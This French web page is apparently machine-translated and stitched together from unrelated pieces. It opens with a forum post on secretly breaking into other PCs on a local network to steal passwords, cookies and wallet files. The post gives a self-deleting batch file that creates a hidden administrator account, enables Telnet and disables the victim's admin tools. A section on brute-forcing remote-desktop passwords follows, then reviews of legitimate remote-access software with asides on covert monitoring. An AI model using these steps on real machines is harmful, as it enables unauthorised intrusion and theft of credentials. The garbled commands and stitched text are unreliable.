LA CLOCHE

Il y a ceux qui lisent cette actualité avant vous.
Abonnez-vous pour recevoir les derniers articles.
Email
Nom
Nom de famille
Comment voulez-vous lire The Bell
Pas de spam
barbillon drôle 2 février 2012 à 14:23

Le moyen caché le plus simple d'accéder au PC souhaité à partir de réseau domestique

Bonjour à tous, c'est mon premier article sur Habré, alors ne jugez pas strictement. Dans cet article, je décrirai comment vous pouvez accéder à distance à l'ordinateur d'un utilisateur sur votre réseau local via la ligne de commande, en contournant tous les antivirus et en connaissant un peu la syntaxe ligne de commande Les fenêtres. L'article est destiné à être utilisé uniquement sur Windows XP, mais si vous le souhaitez, vous pouvez réécrire le code pour tout autre système d'exploitation de la famille Windows. Alors, commençons. Dans l'ensemble, cet article est destiné aux utilisateurs débutants. L'objectif le plus important est d'obtenir les données nécessaires (mots de passe, apparences, chalets d'été, accès aux boîtes aux lettres, fichiers clés webmoney, cookies et autres pellicules importantes) et les laisser inaperçues sans laisser de traces de pénétration. Alors, commençons, je suis sur un réseau local avec environ 5000 utilisateurs, un réseau avec statique ou DHCP n'a pas d'importance, j'ai une adresse IP et je suis content. Le réseau a une tonne de sous-réseaux, dont les routes sont enregistrées sur le serveur. Adresse Mac l'ordinateur est enregistré auprès de l'administrateur réseau, car dans mon cas, c'était une condition pour se connecter à la grille, donc mon coquelicot s'allumera si quelque chose se passe. Pour éviter d'être trouvé, tout d'abord nous installons machine virtuelle (J'ai utilisé VmWare 5.1), installez XP dessus, un scanner de port (j'ai utilisé SuperScan 3.00 vous pouvez le télécharger) et démarrez le service Telnet. Nous connectons la machine virtuelle au réseau en utilisant NAT et obtenons ainsi une adresse mac complètement différente de la machine regardant dans le réseau. Nous avons installé toute la machine virtuelle bourdonnante, passons à autre chose. Nous ouvrons un cahier ordinaire et écrivons un fichier batch avec le contenu suivant:

@Écho off
Net user Admin_Support lop / add\u003e nul
Net groupe local net groupe local Ђ¤¬Ёёбва в®al Admin_support / add\u003e nul
Comptes nets / maxpwage: unlimited\u003e nul sc config TlntSvr start \u003d auto\u003e nul
Sc démarrer TlntSvr\u003e nul
Reg ajouter "HKLM \\ SOFTWARE \\ Microsoft \\ WindowsNT \\ CurrentVersion \\ Winlogon \\ SpecialAccounts \\ UserList" / v Admin_support / t REG_DWORD / d 0\u003e null
Reg ajouter "HKCU \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ policies \\ System" / v DisableRegistryTools / t Reg_dword / d 1 / f\u003e nul Reg ajouter "HKCU \\ SOFTWARE \\ POLICIES \\ Microsoft \\ MMC" / v RestrictPemitSnapins / t Reg_dword / d 1 / f\u003e nul del% SestemRoot% \\ system32 \\ compmgmt.msc\u003e nul
del Start_game.bat

Tags: virus, piratage, sécurité, sécurité de l'information

Aujourd'hui, on parle beaucoup de pirater les ordinateurs des autres. Cependant, selon de nombreux experts dans ce domaine, il serait plus correct de dire non pas "comment pirater" l'ordinateur "de quelqu'un d'autre, mais" comment y accéder sans autorisation ". Dans ce cas, il ne peut être question d'aucune action destructrice. Essayons de considérer les méthodes les plus simples avec lesquelles vous pouvez résoudre le problème de la façon d'entrer dans «l'ordinateur» de quelqu'un d'autre.

Biais fictifs

Malheureusement, aujourd'hui, de nombreux utilisateurs commencent à développer une peur croissante du piratage ou du piratage de leurs terminaux informatiques. Franchement, cela n'a aucun sens. Qui a besoin de toi? Il est également clair quand il est stocké sur des ordinateurs ou des serveurs. Ensuite, oui. Beaucoup ne sont pas opposés à en profiter.

Les systèmes informatiques domestiques sont pour la plupart piratés par des amateurs hooligans qui n'ont tout simplement rien à faire. Parfois, cependant, il y a ceux qui peuvent voler des mots de passe pour accéder à des sites ou des codes de cartes bancaires (à condition qu'ils soient stockés en clair sur le terminal domestique). Mais c'est rare.

Comprenant comment entrer dans "l'ordinateur" de quelqu'un d'autre, nous pouvons dire (cela semble assez étrange) que même un enfant peut le faire s'il a les utilitaires appropriés et la capacité de les utiliser. Considérons les méthodes les plus primitives.

Sur quoi repose le piratage informatique?

Dans la plupart des cas, la méthode la plus simple mais la plus efficace est utilisée. En principe, le problème même de l'accès à l '«ordinateur» de quelqu'un d'autre se réduit uniquement à l'obtention de l'adresse IP du terminal informatique et de celle de la victime. Ce qui est le plus intéressant, dans la plupart des cas, de nombreux amateurs ne choisissent pas quelqu'un spécifiquement, mais analysent simplement une plage prédéterminée d'adresses IP de systèmes informatiques vulnérables, juste pour l'intérêt ou pour tester leur force.

Par conséquent, pour ceux qui ont trop peur pour leurs données, il vaut mieux veiller à l'avance à la sécurité en installant le logiciel approprié.

Utilisation de Shared Resource Scanner

Alors, vous vous demandez comment accéder à «l'ordinateur» de quelqu'un d'autre. Pour commencer, vous pouvez appliquer l'un des moyens simplesà l'aide de l'utilitaire Shared Resource Scanner 6.2.

Avant de commencer le travail, dans (menu Exécuter), par exemple, sous Windows XP, vous devez entrer la commande winipcfg pour connaître votre propre adresse IP. Une fenêtre avec votre adresse apparaîtra. Il faut s'en souvenir.

Programme Lamescan

Maintenant, quelques mots sur une autre façon d'apprendre comment entrer dans "l'ordinateur" de quelqu'un d'autre. Tout d'abord, le programme VNC-scanner GUI 1.2 est utilisé pour vérifier les adresses IP avec le port 4899 ou 3389 ouvert.

Maintenant, dans l'application Lamescan, entrez les adresses requises et sélectionnez un mot de passe. Vous pouvez le créer vous-même, vous pouvez télécharger une liste des mots de passe les plus fréquemment utilisés sur Internet. Une fois qu'un match est trouvé, vous pouvez vous réjouir.

Considérations éthiques

En conclusion, je tiens à noter que cet article n'est pas un appel à l'action. Il s'agit plutôt d'un matériel pédagogique général, en aucun cas nuisible aux utilisateurs. Et ceux qui vont le faire devraient réfléchir à la légalité de telles actions et aux considérations éthiques.

Le travail simultané sur plusieurs ordinateurs, dont un seul est devant vous, et le reste - même de l'autre côté de la Terre - n'est pas un fantasme. Pour avoir cette opportunité miraculeuse, tout ce dont vous avez besoin est un accès Internet et un logiciel de contrôle à distance sur chaque machine.

Les programmes de contrôle à distance sont des ponts qui connectent un PC ou un gadget mobile devant vous à divers appareils informatiques dans le monde. Bien sûr, si vous avez une clé, c'est-à-dire un mot de passe qui permet une connexion à distance avec eux.

Les possibilités de programmes de ce type sont très larges. C'est l'accès au contenu des disques, et le lancement applications installées, et modifier les paramètres du système, et visualiser les actions des utilisateurs ... En un mot, ils vous permettent de faire presque tout sur un PC distant comme sur un PC local. L'article d'aujourd'hui est un aperçu de six démon programmes payants le contrôle à distance d'un ordinateur Windows (et pas seulement), dont l'un fait partie du système opérateur.

Si vous devez établir une connexion entre deux ordinateurs ou un PC et un appareil mobile, dont l'un (distant) exécute Windows et l'autre exécute Windows, iOS, Android ou Mac OS X, vous pouvez parfois vous en passer programmes tiers (si seuls les ordinateurs Windows participent à la connexion). Application système «Remote Desktop» est présent dans toutes les éditions de «Windows» depuis XP. Il n'est pas nécessaire que les deux machines aient la même version du système d'exploitation, vous pouvez facilement établir une connexion, par exemple, entre Windows 10 et Windows 7.

L'application Microsoft Remote Desktop pour Android et Apple est disponible en téléchargement gratuit sur Google Play et l'App Store.

Que faut-il d'autre pour créer une connexion:

  • Autorisation d'accès à distance - Configuré sur l'ordinateur que vous souhaitez contrôler en externe.
  • Un compte avec un mot de passe sur l'ordinateur distant. Pour résoudre les tâches administratives (installation et suppression de programmes, modification des paramètres système, etc.), vous avez besoin d'un compte avec des droits d'administrateur.
  • Connecter les deux machines à Internet ou les trouver sur le même réseau local.
  • Du côté de la réception - port ouvert TCP 3389 (utilisé par défaut par Remote Desktop).

Comment activer l'autorisation

Ces instructions et d'autres sont illustrées à l'aide de l'exemple de Windows 10.

  • Faisons un clic droit sur l'icône "Ce PC" sur le bureau. Ouvrons "Propriétés".

  • Étant dans la fenêtre "Système", cliquez sur le panneau de transition "Paramètres d'accès à distance". Dans la section de la fenêtre "Bureau à distance" cochez la case "Autoriser ..." (la case à cocher "Autoriser les connexions uniquement avec authentification" est préférable de quitter). Ensuite, cliquez sur "Sélectionner les utilisateurs".

  • Pour ajouter un utilisateur qui sera autorisé à se connecter à vous à distance, cliquez sur «Ajouter». Dans le champ "Entrer les noms", entrez le nom de son compte sur cet ordinateur (n'oubliez pas, il doit être avec un mot de passe!), Cliquez sur "Vérifier les noms" et OK.

Ceci termine la configuration.

Comment configurer les paramètres de connexion

Nous effectuons les actions suivantes sur l'ordinateur à partir duquel nous établirons une connexion à distance.

  • Cliquons sur l'icône de recherche dans la barre des tâches et commençons à taper le mot «distant». Choisissons parmi la "Connexion au bureau distant" trouvée.

  • Par défaut, la fenêtre de l'application s'ouvre réduite, où il n'y a que des champs pour saisir le nom de l'ordinateur et les données utilisateur. Pour accéder à tous les paramètres, cliquez sur la flèche "Afficher les paramètres". Au bas du premier onglet - "Général", il y a un bouton pour enregistrer les paramètres de connexion dans un fichier. Ceci est utile lorsque vous utilisez différents paramètres pour vous connecter à différentes machines.

  • L'onglet suivant - "Affichage", vous permet de modifier les propriétés de l'image de l'écran de l'ordinateur distant sur votre moniteur. En particulier, augmentez et diminuez la résolution, utilisez plusieurs moniteurs, modifiez la profondeur de couleur.

  • Ensuite, nous allons configurer "Ressources locales" - son d'un ordinateur distant, conditions d'utilisation des raccourcis clavier, accès à imprimante à distance et un presse-papiers.

  • Les paramètres de l'onglet "Interaction" affectent la vitesse de connexion et la qualité d'affichage des images d'une machine distante sur votre moniteur.

  • L'onglet «Avancé» permet de définir des actions en cas d'échec de l'authentification d'un PC distant, ainsi que de définir les paramètres de connexion lors de la connexion via une passerelle.

  • Pour démarrer une session d'accès à distance, appuyez sur "Se connecter". Dans la fenêtre suivante, entrez le mot de passe.

Une fois la connexion établie, la session sur l'ordinateur de l'utilisateur actuel sera terminée et le contrôle vous sera transféré. L'utilisateur du PC distant ne pourra pas voir son bureau car un écran de démarrage apparaîtra à la place.

En suivant ces instructions, vous pouvez facilement vous connecter à un ordinateur qui se trouve sur le même réseau que le vôtre. Si les appareils sont connectés à différents réseaux, vous devrez effectuer quelques réglages supplémentaires.

Comment se connecter à un ordinateur distant via Internet

Il existe 2 façons de configurer une connexion de télétravailleur bureau Windows sur Internet - en créant un canal VPN pour que les appareils puissent se voir comme s'ils étaient sur le même réseau local, et en redirigeant le port 3389 vers réseau local et changer l'adresse IP dynamique (variable) de la machine distante en une adresse permanente (statique).

Il existe de nombreuses façons de créer des canaux VPN, mais une description de chacun d'entre eux prendra beaucoup de place (en outre, de nombreuses informations à ce sujet se trouvent facilement sur le réseau). Par conséquent, nous considérerons, par exemple, l'un des plus simples - en utilisant des outils Windows natifs.

Comment créer un canal VPN sur Windows

Sur la machine distante qui sera le serveur:


Après cela, le composant Connexions entrantes apparaîtra dans le dossier des connexions réseau, qui sera le serveur VPN. Pour éviter que la connexion ne soit bloquée par le pare-feu, n'oubliez pas d'ouvrir le port TCP 1723 sur l'appareil. Et si le serveur se voit attribuer une adresse IP locale (commençant par 10, 172.16 ou 192.168), le port devra être redirigé vers le réseau externe. Comment faire cela, lisez ci-dessous.

Sur un ordinateur client (Windows 10), la connexion est encore plus simple à mettre en place. Lancez l'utilitaire "Paramètres", allez dans la section "Réseaux et Internet" -\u003e "VPN". Cliquez sur Ajouter une connexion VPN.

Dans la fenêtre des paramètres, spécifiez:

  • Le fournisseur de services est Windows.
  • Le nom de connexion peut être n'importe quoi.
  • Nom ou adresse du serveur - L'adresse IP ou le nom de domaine du serveur que vous avez créé auparavant.
  • Type de VPN - détecte automatiquement ou PPTP.
  • Type de données de connexion - nom d'utilisateur et mot de passe (l'un des comptes auxquels vous avez donné l'autorisation d'accéder). Afin de ne pas saisir ces données à chaque fois que vous vous connectez, notez-les dans les champs appropriés ci-dessous et cochez la case "Se souvenir".


Redirection de port du routeur et obtention d'une adresse IP statique

Transfert (transfert) des ports vers différents appareils (routeurs) est réalisé à sa manière, mais le principe général est le même partout. Voyons comment cela est fait en utilisant l'exemple d'un routeur domestique TP-Link typique.

Ouvrons la section "Transfert" et "Serveurs virtuels" dans le panneau d'administration du routeur. Dans la moitié droite de la fenêtre, cliquez sur le bouton "Ajouter".

Dans la fenêtre "Ajouter ou modifier un enregistrement", entrez les paramètres suivants:

  • Port de service: 3389 (ou 1723 si vous configurez un VPN).
  • Le port interne est le même.
  • Adresse IP: adresse de l'ordinateur (voir les propriétés de connexion) ou nom de domaine.
  • Protocole: TCP ou tout.
  • Port de service standard: vous pouvez le laisser vide ou choisir dans la liste PDP, et pour VPN - PPTP.

Comment rendre permanente une adresse IP modifiable

Le paquet standard de services des fournisseurs Internet pour les abonnés à domicile, en règle générale, ne comprend qu'une adresse IP dynamique en constante évolution. Et attribuer une adresse IP inchangée à un utilisateur lui coûte généralement une somme ronde. Pour que vous n'ayez pas à encourir de frais supplémentaires, il existe des services DDNS ( dNS dynamique), dont la tâche est d'attribuer un nom de domaine permanent à un appareil (ordinateur) avec une adresse réseau changeante.

De nombreux services DDNS fournissent leurs services gratuitement, mais il y a aussi ceux qui facturent un petit abonnement pour cela.

Voici une courte liste de DDNS gratuits, dont les capacités sont plus que suffisantes pour notre tâche.

Les règles d'utilisation de ces services, s'ils diffèrent, sont insignifiantes: nous procédons d'abord à l'enregistrement d'un compte, puis nous confirmons l'adresse e-mail, et enfin, nous enregistrons le nom de domaine de votre appareil et l'activons. Après cela, votre ordinateur de famille aura son propre nom sur Internet, par exemple 111pc.ddns.net. Ce nom doit être spécifié dans les paramètres de connexion au lieu de l'adresse IP ou du nom dans le réseau local.

À propos, certains routeurs ne prennent en charge qu'un petit groupe de fournisseurs DDNS, par exemple, uniquement le DynDNS le plus ancien et le plus célèbre (maintenant payé) et No IP. D'autres comme Asus ont leur propre service DDNS. L'installation d'un micrologiciel DD-WRT alternatif sur le routeur permet de supprimer les restrictions.

Avantages et inconvénients de l'utilisation du bureau à distance Windows

Le principal avantage du propriétaire outils Windows face au développement tiers - c'est l'absence de serveurs intermédiaires lors de la connexion, ce qui signifie que le risque de fuite de données est réduit. De plus, cet outil a beaucoup de réglages flexibles et avec une approche habile peut devenir une "forteresse imprenable" et une "fusée spatiale".

Les autres avantages du bureau Windows sont l'absence de nécessité de télécharger quelque chose, les restrictions sur la durée de la session, le nombre de connexions et la gratuité.

Inconvénients - difficulté de configuration pour l'accès Internet, vulnérabilité aux attaques Pass the Hash.

TeamViewer

Avant de commencer à utiliser le service, vous devrez vous inscrire compte Google (les utilisateurs d'appareils Android l'ont déjà) ou connectez-vous à navigateur Google Chrome.

La fenêtre principale de "Chrome Desktop" comprend 2 sections:

  • Assistance à distance. Il contient des options pour gérer une connexion unique à un autre PC et accorder l'accès au vôtre.
  • Mes ordinateurs. Cette section contient les machines avec lesquelles vous avez précédemment établi une communication et pouvez vous y connecter rapidement à l'aide du code PIN spécifié.

Lors de la première session de communication utilisant Chrome Desktop, un composant supplémentaire (hôte) sera installé sur l'ordinateur distant, ce qui prendra 2 à 3 minutes. Lorsque tout est prêt, un code secret apparaîtra à l'écran. Après l'avoir entré dans le champ approprié, cliquez sur "Connecter".

Comme avec TeamViewer, l'utilisateur de la machine distante pourra voir toutes vos actions à l'écran. Ainsi, pour la surveillance secrète, par exemple, d'un enfant, ces programmes ne conviennent pas.

Est un utilitaire très simple et tout aussi fiable conçu pour le contrôle à distance des ordinateurs sous Windows et Linux. Ses principaux avantages sont la facilité d'utilisation, la fiabilité, la vitesse de connexion élevée et aussi le fait qu'il ne nécessite pas d'installation. Contre - en l'absence versions mobiles (il ne sera pas possible d'établir une connexion via Android et iOS avec ce programme) et le fait que de nombreux antivirus le considèrent comme malveillant et tentent de le supprimer. Heureusement, ce dernier peut être facilement évité en ajoutant l'utilitaire aux exceptions.

Ammyy Admin prend en charge 2 façons d'établir la connexion - par numéro d'identification et par adresse IP. Le second fonctionne uniquement sur le réseau local.

La fenêtre de l'utilitaire est divisée en 2 moitiés - «Client», où se trouvent les données d'identification de l'ordinateur et le mot de passe, et «Opérateur» - avec des champs pour saisir ces données. Le bouton de connexion se trouve également ici.

Le carnet de contacts et les paramètres du programme, qui sont assez simples, sont cachés dans le menu Ammyy.

- un autre programme Windows portable compact, d'apparence similaire au précédent, mais avec un ensemble de fonctions plus intéressant. Prend en charge 2 méthodes de connexion - par ID et IP, et 3 modes - contrôle total, gestionnaire de fichiers (transfert de fichiers) et affichez uniquement l'écran du PC distant.

Il permet également de définir plusieurs niveaux de droits d'accès:

  • Utilisation du clavier et de la souris par l'opérateur à distance.
  • Synchronisation du presse-papiers.
  • Changement des droits d'accès par l'administrateur, etc.

Le mode "Afficher uniquement" peut être utilisé pour la surveillance secrète des actions des utilisateurs de machines distantes (enfants, travailleurs), ce qui n'est pas dans des produits similaires.

Dans la fenêtre principale d'AeroAdmin, il y a un bouton pour ouvrir une discussion par e-mail (situé à côté du bouton "Arrêter"). Le chat est conçu pour envoyer rapidement un e-mail à l'opérateur, par exemple pour demander de l'aide. Cette fonction est unique, car dans les programmes analogiques, il n'y a qu'un chat régulier pour échanger des messages texte. Et il ne commence à fonctionner qu'une fois la connexion établie.

Malheureusement, le carnet de contacts AeroAdmin n'est pas immédiatement disponible. Il nécessite une activation séparée via Facebook. Et seuls les participants réseau social, puisque les développeurs demandent un lien vers une page personnelle pour recevoir un code d'activation. Il s'avère que ceux qui ont aimé le programme ne peuvent se passer de l'inscription sur Facebook.

Une autre caractéristique d'AeroAdmin est l'admissibilité de l'utilisation gratuite même à des fins commerciales, si elle n'est pas nécessaire caractéristiques supplémentaires (connexion continue, plusieurs sessions simultanées, etc.), disponible uniquement dans les versions payantes.

- le dernier utilitaire de la revue d'aujourd'hui pour se connecter à distance à un PC Windows à partir d'un autre ordinateur ou appareil mobile... Peut être utilisé avec ou sans installation.

Comme ses prédécesseurs, il présente un certain nombre de caractéristiques uniques:

  • Le taux de transfert d'image le plus rapide depuis une machine distante.
  • Plus échange rapide fichiers, même à des vitesses Internet faibles.
  • Prise en charge de la connexion simultanée de plusieurs utilisateurs distants. La possibilité de travailler ensemble sur un projet (chaque utilisateur a son propre curseur).

De plus, comme d'autres programmes de cette classe, AnyDesk fournit à l'opérateur un accès complet aux fonctions de la machine distante, il est très facile de se connecter (par ID et mot de passe) et protège de manière fiable les données transmises.

Certains d'entre vous, après avoir lu le titre de l'article, ont probablement posé la question: «Pourquoi avons-nous besoin contrôle d'un autre ordinateur via Internet? " Il s'avère que c'est nécessaire, et avant tout, pour les lecteurs potentiels de mon blog - retraités et nuls.

Ne pensez pas que je veux que vous appreniez cela pour prendre le contrôle de l'ordinateur de votre voisin, dont le chien, avec ses aboiements constants, vous rend fou et commence à faire quelque chose d'incroyable avec lui, le terrifiant lui et son chien. Bien sûr que non. Et à son insu, il est peu probable que vous réussissiez dans une telle gestion. Je ne vais pas vous intriguer, je vais passer au sujet.

Pourquoi avez-vous besoin de contrôler un autre ordinateur via Internet

Bien sûr, d'abord et avant tout, pour quelqu'un de plus expérimenté et versé dans
la technologie informatiquePar exemple, votre ami ou parent vivant loin de chez vous pourrait, si nécessaire, vous aider à résoudre avec votre PC à distance.

Oui, même les problèmes ne sont pas nécessaires, mais il suffit de mettre en place une sorte de programme ou d'aider à émettre la même demande de passeport via Internet. Ou autre cas: vous êtes déjà un utilisateur assez expérimenté et vous devez parfois regarder votre PC à la maison depuis votre ordinateur portable «de voyage» pendant votre absence.

Au moins pour imprimer une sorte de documentaire, qui n'est que là. Ou pour une raison quelconque, vous ne savez jamais? C'est là que vous devez en contrôler un autre, c'est-à-dire votre ordinateur personnel via Internet.

Ou prenez une entreprise qui a son propre réseau local. Imaginez comment l'administrateur système devra s'exécuter, si vous avez besoin d'exécuter le programme quelque part ou de sortir un autre PC du blocage. Et s'il y a des centaines d'ordinateurs, et pas un, mais dans des cas différents? Ici, vous devez être un sprinter. Et puis, après un certain temps, vous effacerez vos jambes à un endroit. J'espère avoir dissipé vos doutes sur l'inutilité de cette affaire?

Comment fonctionne l'administration à distance

Bien sûr, ce ne sont pas des astuces de hackers et divers chevaux de Troie. Bien que les méthodes des programmes utilisés pour contrôler à distance un ordinateur via Internet soient très similaires. Et ils diffèrent des virus uniquement en ce qu'ils agissent ouvertement et naturellement, avec le consentement mutuel des propriétaires des PC impliqués dans ce processus.

Ils se composent de deux parties. Le premier est le serveur, le second est le client. Le serveur est installé sur l'ordinateur à contrôler et la partie client sur celle utilisée par l'administrateur. À cet égard, les administrateurs distants sont très similaires aux chevaux de Troie. Mais, comme vous pouvez l'imaginer, leurs objectifs sont complètement différents.

Vous pouvez vous connecter au PC sur lequel ce serveur est installé en connaissant uniquement son adresse IP, ainsi que le mot de passe, qui doit être défini sur celui-ci afin d'empêcher quiconque de s'y rendre via Internet. Sinon, ce «à peu près tout le monde» ne pourra travailler sur votre «idée originale» que n'importe quel cheval de Troie.

Impact du type d'adresse IP et résolution des problèmes

Si vous avez une adresse IP statique pour l'accès Internet, il n'y aura aucun problème. Mais s'il est statique, mais fait partie du réseau d'une maison ou d'un quartier, et que ceux-ci, à leur tour, ont une adresse dynamique (c'est-à-dire changeant de temps en temps) pour accéder à Internet, des difficultés peuvent déjà survenir. Eh bien, juste si vous n'êtes membre d'aucun réseau, mais accédez à Internet à une adresse dynamique - le même problème.

Mais ces problèmes peuvent être résolus. Il existe, par exemple, des sites spéciaux comme No-Ip.com ou DynDNS.com, où vous pouvez vous inscrire, installer un programme de «mise à jour» et obtenir une adresse permanente à travers eux: user.no-ip.com. Certes, ces sites sont en anglais, mais si vous en avez besoin, je suis sûr que vous pouvez en trouver d'autres et des sites en russe.

Ceci est pour information, mais en général, je ne m'en soucierais pas. Actuellement, il existe de nombreux programmes prêts à l'emploi qui prennent à chaque fois eux-mêmes en charge tout ce travail technique avec l'enregistrement de l'adresse actuelle sur leur serveur et indiquent à quelle adresse rechercher votre PC sur Internet.

Mais si une adresse IP statique est nécessaire (par exemple, j'en ai besoin pour un certain nombre d'autres raisons), cela peut être fait via votre fournisseur. Qui ne sait pas, FAI est un fournisseur d'accès Internet. Dans notre ville de Bashinformsvyaz, la connexion coûte 150 roubles, les frais mensuels sont de 50 roubles. N'acceptez pas un si grand montant, même pour les retraités.

Possibilités après connexion à distance

Je ne parlerai pas des commodités qui apparaissent après cela. Cela a été dit au tout début lorsque nous avons compris à quoi cela servait. Et quelles sont les opportunités spécifiques directement liées au management? Voici les principaux:

  • voir le bureau, ou plutôt une copie du PC distant sur votre écran;
  • contrôle d'interception à tout moment avec un clavier ou une souris;
  • exécutez tous les programmes installés sur l'ordinateur géré et installez-en de nouveaux si nécessaire;
  • ouvrir et, si nécessaire, modifier les fichiers;
  • télécharger des fichiers via Internet dans les directions avant et arrière;

Ainsi, grâce à l'administration à distance, nous obtenons le contrôle total d'un autre ordinateur via Internet. Contrôle pratiquement illimité. Bien sûr, c'est avec le plein consentement de son propriétaire. Seulement pour cela, vous avez besoin d'une vitesse de canal de communication d'au moins 256 Kbit / s et programme spécial.

Programmes pour contrôler un autre ordinateur via Internet

À ces fins, il existe suffisamment de programmes, payants et gratuits. Je vais énumérer les plus courants et bien sûr gratuits:

  • LogMeIn Hamachi

    Vous permet de combiner dans le vôtre réseau virtuel via Internet jusqu'à 16 PC de différentes régions du monde. En plus de la gestion, il existe de nombreuses autres possibilités, jusqu'à l'organisation de jeux en réseau;
  • Ultra VNC

    Il peut organiser le contrôle à distance même lorsque tous les autres programmes sont impuissants, mais les réglages sont très difficiles pour les débutants et il n'y a pas de support pour la langue russe; / li\u003e
  • Ammyy

    Extérieurement, le programme ressemble beaucoup à Team Viewer. Mais le principe de son fonctionnement est radicalement différent. Il se lie au matériel du PC, et il suffit donc d'admettre une fois le programme avec l'ID donné à l'ordinateur et à l'avenir, il pourra s'y connecter sans aucune demande.
  • Équipe Viever

    Tout d'abord, ce programme est bon en ce qu'il est complètement indifférent à votre adresse statique ou dynamique. Travailler avec lui, sans exagération, est cent fois plus facile qu'avec le "Remote Assistant" natif de Windows. Nous devons uniquement installer le programme sur les PC que nous allons utiliser dans ce processus et créer notre compte dans le service Team Viewer.

Installation du logiciel Team Viever

Il n'y a rien de compliqué ici, mais comme mon blog est principalement destiné aux retraités et aux nuls, nous allons l'analyser en détail et nous concentrer sur certaines nuances. Dans la première fenêtre, sélectionnez "Installer":

Sur ce point, je pense, nous pouvons terminer.

Bonne chance à toi! A bientôt sur les pages du blog PenceMen.

Aujourd'hui, une fonction telle que contrôler un autre ordinateur via Internet n'est pas surprenante. Il existe de nombreux systèmes d'accès à distance gratuits qui permettent de transférer facilement des informations entre utilisateurs et d'effectuer diverses opérations sur un autre appareil via Internet ou un réseau local.


Cette fonction est particulièrement nécessaire, par exemple, lorsqu'une personne qui n'est pas particulièrement familiarisée avec les paramètres du système d'exploitation tente de modifier les paramètres. Afin de ne pas passer beaucoup de temps à expliquer, vous pouvez facilement et en quelques secondes définir vous-même les options nécessaires. De tels utilitaires sont désormais indispensables pour travailler à distance, par exemple, vous ne pouvez pas perdre de temps à vous rendre au bureau, à faire tout le travail à domicile, à être administrateur système et à contrôler l'ordinateur principal depuis votre PC à la maison. Toutes les données seront disponibles à tout moment. Ne vous inquiétez pas non plus pour la sécurité - toutes les informations sont soumises à un cryptage fiable, toutes les données sont transmises de manière strictement confidentielle. Ces utilitaires peuvent également être utilisés pour la communication, ce qui permet d'économiser de l'argent sur les communications vocales.

Il existe pas mal de programmes pour contrôler un autre ordinateur, nous allons considérer les cinq plus populaires, effectuer une analyse, noter les avantages et les inconvénients.

Ce programme est peut-être le plus populaire parmi les utilisateurs et est en tête depuis longtemps. En principe, il y a une raison - la fonctionnalité est vraiment bonne. L'utilitaire ne pèse pas beaucoup, se télécharge rapidement et est disponible gratuitement. De plus, aucune installation n'est requise, vous pouvez démarrer et travailler immédiatement. En conséquence, l'interface et les fonctions sont disponibles même pour l'utilisateur le moins expérimenté. Après le démarrage, une fenêtre avec l'ID et le mot de passe de ce PC et une fenêtre pour saisir les données correspondantes d'un autre appareil s'affichent.

L'application présente de nombreux avantages. Par exemple, il vous permet de transférer des fichiers, de discuter, de partager votre écran, etc. Vous pouvez également définir le mode d'accès 24 heures sur 24 à l'appareil, cette fonction est utile pour les administrateurs système. Il convient de noter la vitesse de travail plutôt élevée, la capacité de travailler sur toutes les plates-formes mobiles et tous les systèmes d'exploitation. Il existe également de nombreuses fonctionnalités plus avancées qui sont utiles pour l'accès à distance.

Bien sûr, il n'y a pas d'échappatoire aux lacunes. Énumérons certains d'entre eux. Le principal est que bien que l'utilitaire soit disponible gratuitement, il ne doit pas être utilisé à des fins commerciales. Compte tenu de ce point, de nombreuses difficultés surgissent. Par exemple, un blocage de travail peut se produire si le programme évalue vos actions comme commerciales. L'expansion des fonctionnalités n'est plus gratuite. De plus, gratuitement, vous ne pourrez pas configurer d'accès 24 heures sur 24. Pour utiliser pleinement l'application, vous devrez payer, et le montant n'est pas si petit.

Ainsi, malgré tous les avantages, cette application pas toujours adapté à une utilisation à long terme. Mais si vous devez effectuer une opération une fois via un accès à distance, c'est idéal.

Si vous souhaitez travailler pendant une longue période, vous devrez soit payer version complète ou soyez prêt qu'à tout moment l'utilisation sera résiliée par l'administrateur.

Jusqu'à récemment, TeamViewer était probablement le seul programme décent du genre. Ou il a été tellement annoncé et promu qu'il a tout simplement surpassé tous ses concurrents. Cependant, aujourd'hui, dans l'arène, il existe d'autres utilitaires qui ne sont pas pires que le précédent, voire même meilleurs à certains moments. Un tel Supremo.

Le programme ne diffère pratiquement pas du populaire TeamViewer, il est tout aussi facile à utiliser, il a un simple et pour tout le monde interface claire, portable, ne nécessite pas d'installation et est prêt à fonctionner à tout moment. L'application n'installe pas ses services. Il existe un mode plein écran pour afficher l'espace de travail sur un autre PC, le chat et d'autres fonctions. Il convient également de noter la vitesse - elle est plus élevée que dans l'utilitaire précédent - les fichiers sont transférés particulièrement simplement et rapidement. Un autre avantage que de nombreux utilisateurs ont apprécié est un mot de passe composé uniquement de chiffres, aussi étrange que cela puisse paraître. Certains ont même abandonné un concurrent populaire et sont passés à Supremo précisément à cause de ce moment. J'explique. Pour contrôler l'ordinateur de quelqu'un d'autre, vous devez obtenir un mot de passe et le transférer avec le numéro d'identification à un autre utilisateur. (L'algorithme est le même dans les deux programmes.) La différence est que TeamViewer génère des mots de passe à partir de lettres et de chiffres latins, tandis que Supremo est limité aux chiffres. Bien sûr, il semblera immédiatement que cela n'a pas d'importance, mais ceux qui sont confrontés à des tentatives de transmission du mot de passe à des parents âgés le considéreront comme un argument. Les nombres sont beaucoup plus faciles à dicter qu'un mot de passe délicat. Surtout pour ceux qui n'utilisent pas de SMS et ne connaissent pas la différence entre les lettres «J» et «g», par exemple. Et le point n'est pas dans l'intelligence, mais dans l'âge.

Bien sûr, TeamViewer a également des paramètres pour simplifier le système de mot de passe, etc., mais dans ce programme, tout n'est simplifié nulle part.

Vous pouvez télécharger l'utilitaire gratuitement via un lien direct depuis le site officiel du développeur. La taille du fichier est de 2 à 3 Mo.

Algorithme de travail Supremo (similaire à TeamViewer)

Le contrôle à distance d'un autre ordinateur nécessite un programme sur les deux appareils.

  • Exécutez l'utilitaire et cliquez sur le programme d'installation, confirmez l'accord avec les exigences de licence.
  • L'étape suivante consiste à appuyer sur "Démarrer" sur l'ordinateur auquel vous accédez.
  • Vous recevez un code secret et un identifiant, puis partagez-les avec un utilisateur partageant les mêmes idées.
  • Votre "ami" doit saisir les données reçues de votre part dans la ligne intitulée "ID partenaire" et se connecter.
  • Ensuite, il doit entrer le mot de passe, en même temps vous verrez une fenêtre vous demandant de confirmer l'opération (elle disparaîtra automatiquement au bout de dix secondes). Après cela, votre ami a un accès complet à votre PC, à la fois visuel et technique.

